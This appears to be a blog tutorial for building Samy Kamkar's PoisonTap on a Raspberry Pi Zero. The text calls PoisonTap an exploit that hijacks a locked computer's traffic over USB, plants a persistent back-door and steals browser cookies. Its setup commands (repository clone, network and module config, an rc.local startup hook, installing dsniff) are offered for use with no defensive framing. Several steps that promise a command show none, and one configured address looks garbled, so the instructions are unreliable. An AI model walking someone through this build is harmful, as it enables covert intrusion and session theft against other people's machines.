PoisonTap on Raspberry Pi Zero
Today we are going to look at how to install Samy Kamkar’s PoisonTap on the Raspberry Pi Zero. This was an exploit designed to bypass locked and password protected computers over USB to install a persistent back-door and siphon cookies from your browser.
How it works:
When PoisonTap is plugged into a locked computer it emulates an Ethernet over USB device and gives the machine a crafted DHCP packet to trick your computer into believing that it should pass all of it’s network traffic through the PoisonTap.
Installing an OS on your Pi:
The first thing we are going to do is install an operating system on your Raspberry Pi Zero. I’ll be using Raspbian Jessie (recommended) all though lots of other systems work too.
Download Raspbian Jessie LITE from the Raspberry Pi Website and drag the
.img file into a safe location. Now for burning the image onto your SD card. The process is the same across every operating systems, just with a different program. These are the programs I would recommend using:
MacOS: Apple Pi Baker
Windows: Win32 Disk Imager
Linux: Brasero (pre-installed)
Let that image burn onto the SD card and when it’s finished, move on to the next section to begin making the changes to boot partition.
Configuring the boot partition
By default, Raspbian disables some of the features that we want to take advantage of to allow us to get into the pi. First we are going to add the following line to the end of
This is going to allow us to load modules onto the Raspberry PI itself. Now we need to actually load those modules. Add the following code segment after
Finally, as of late 2016, Raspbian has disabled SSH by default so we need to go re-enable it. To do this, we simple need to create a new file called
ssh with no extensions in
/boot/ssh. This file doesn’t need any contents, it simply has to exist.
SSH into the Raspberry Pi
Next we need to gain control over the pi via SSH. To do this, plug your Raspberry Pi into your computer over USB and make sure you are using USB input not PWR! This is essential since you cannot transmit any data over the power microUSB. Open up your terminal and type the following:
When prompted for a password, type
raspberry. These are the default credentials for the Raspberry Pi. You can go change these later by typing
If you are not using the Lite version of Raspbian for installing PoisonTap, you can this step. But the Lite version doesn’t ship with git installed, so we need to do that:
sudo apt-get install git
Next we need to clone Samy Kamkars repository onto the Pi. We can do this with the following command:
git clone https://github.com/samyk/poisontap.git
Now change directories into the new folder named
Now, we can run a simple setup script written to do all the dirty work for you to setup the files to run on boot, etc.
echo -e “\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 126.96.36.199\n\tnetmask 0.0.0.0” >> /etc/network/interfaces
echo “dtoverlay=dwc2” >> /boot/config.txt
echo -e “dwc2\ng_ether” >> /etc/modules
echo “/bin/sh /home/pi/poisontap/pi_startup.sh” >> /etc/rc.local
chown -R pi /home/pi/poisontap
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs
The last thing we need to do in order to get PoisonTap up and running is to move the DHCP configuration file:
sudo mv dhcpd.conf /etc/dhcp/dhcpd.conf
You should now have an up and running PoisonTap device!
One note to take is that if your PoisonTap device is not acting as an Ethernet device as it should, you can change the VID and PID in
pi_startup.sh to give it another shot!